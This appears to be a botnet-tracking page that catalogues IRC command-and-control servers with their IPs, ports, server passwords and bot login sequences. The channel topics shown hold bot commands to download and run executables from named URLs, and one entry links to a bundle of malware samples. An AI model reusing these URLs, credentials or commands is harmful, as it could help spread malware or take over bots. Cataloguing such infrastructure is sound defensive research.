Resolved : [Firewall.yi.org] To [91.93.117.180] Resolved : [Firewall.yi.org] To [87.236.232.25] Remote Host Port Number 62.219.170.83 80 96.17.109.43 80 91.93.117.180 33725 87.236.232.25 33725 Now talking in #N3t Topic On: [ #N3t ] [ ] Topic By: [ cyber ] hosting infos: http://whois.domaintools.com/91.93.117.180
82.243.195.7(irc botnet hosted in France Nice Free Sas)
Remote Host Port Number 193.107.204.81 6667 WHO #bitcoin83 82.243.195.7 8333 WHO #bitcoin83 NICK x958986756 USER x958986756 8 * : x958986756 USERHOST x958986756 NICK uAoggnooyBzZnpi JOIN #bitcoin83 hosting infos: http://whois.domaintools.com/82.243.195.7
77.79.7.246(ngrBot hosted in Lithuania Splius Uab)
DNS Lookup Host Name IP Address api.wipmania.com api.wipmania.com 213.251.170.52 fullyundetectable.com UDP Connections Download URLs http://213.251.170.52/ (api.wipmania.com) Outgoing connection to remote server: api.wipmania.com TCP port 80 C&C Server: 77.79.7.246:1863 Server Password: Username: iogjzhd Nickname: n{DE|XPa}iogjzhd Channel: #ngr (Password: ngrbot) Channeltopic: :.s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg Now talking in #ngr Topic On: [ #ngrRead more...
xvm-9-86.ghst.net(ngrBot hosted in France Gandi)
Remote Host Port Number 213.251.170.52 80 92.243.18.207 80 92.243.18.207 3212 PASS ngrBot 92.243.18.207 4949 PASS ngrBot 92.243.9.86 3211 PASS ngrBot 92.243.9.86 3333 PASS ngrBot Now talking in #nazel Topic On: [ #nazel] [ !NAZEL http://vjestice.fileave.com/46cc323cfb4d5be72a3969dff8338cdf.exe 46CC323CFB4D5BE72A3969DFF8338CDF !NAZEL http://mediahostdata.org/install.52161.exe -r !j -c US,USA,GBR,GB,AUS,AU,CA #ppi ] Topic By: [ DD ] Parts: DD [Mr_DD@HeavenOnEarth] Now talking inRead more...
kayits.byinter.net(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
found by tr0j3n Remote Host Port Number kayits.byinter.net 7107 NICK new[iRooT-XP-USA]667657 USER 3221 “” “TsGh” :3221 JOIN #!MSN! Coded NICK [iRooT-XP-USA]008675 USER 0086 “” “TsGh” :0086 NICK [iRooT-XP-USA]049882 USER 0498 “” “TsGh” :0498 hosting infos: http://whois.domaintools.com/94.102.1.163
yesim.hoodrich.ru(irc botnet hosted in United States South Lake Tahoe Reliablehosting.com – Network Services)
Remote Host Port Number yesim.hoodrich.ru:4042 Resolved : [yesim.hoodrich.ru] To [216.131.127.13] 216.131.127.13 4042 89.201.164.126 80 NICK new[USA|XP|COMPUTERNAME]pethrmn USER xD “” “lol” :xD JOIN #biznew# PONG 422 PONG :irc.priv8net4.com C&C Server: 64.69.44.51:4042 Server Password: Username: hh Nickname: new[DEU|XP|DELL-D3E62F7E26]tmlnhjx Channel: #biznew# (Password: ) Channeltopic: :!down /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/57/38/42/59/51/59/52/20/52/54/38/67/114/97/97/40/105/109/102/ * The data identified by the following URL was then requested fromRead more...
91.211.117.46(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number 213.251.170.52 80 91.211.117.81 80 91.211.117.46 1865 PASS ngrBot NICK n{US|XPa}ruzgvfp USER ruzgvfp 0 0 :ruzgvfp JOIN #main 4m3r1k4 QUIT :rebooting Now talking in #main Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ] Topic By: [ RamzGallagher ] hosting infos: http://whois.domaintools.com/91.211.117.46
Worm.Win32.FFAuto.uy
Exe file: http://123back.com/1.EXE Java drive by: http://123back.com/ * The following Host Names were requested from a host database: o sam.chatsmate.com o ms.tvchatz.com o chatsmate.com o justchatz.com o tvchatz.com sam.chatsmate.com ms.tvchatz.com chatsmate.com justchatz.com UDP Connections Remote IP Address: Port: 7202 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s) of size 0 Remote IP Address:Read more...
12mb malware samples
Mostly botnets and baking trojans have fun Download: http://e422237e.tubeviral.com
193.106.172.131(ngrBot hosted in Russian Federation Moscow Iqhost Ltd)
Remote Host Port Number 193.106.172.131 1863 PASS ngrBot 213.251.170.52 80 NICK n{US|XPa}hvjyted USER hvjyted 0 0 :hvjyted JOIN #80t35ref 1963.g3rb3rs1t0.3691 UPDATE: NICK n{US|XPa}llwonwe USER llwonwe 0 0 :llwonwe JOIN #80t35ref 1963.g3rb3rs1t0.3691 Now talking in #80t35ref Topic On: [ #80t35ref ] [ *pu http://vector7.net/pOUI712yd.exe 0bba6a00254d8eec745e831e1e90d75d ] Topic By: [ cholo ] hosting infos: http://whois.domaintools.com/193.106.172.131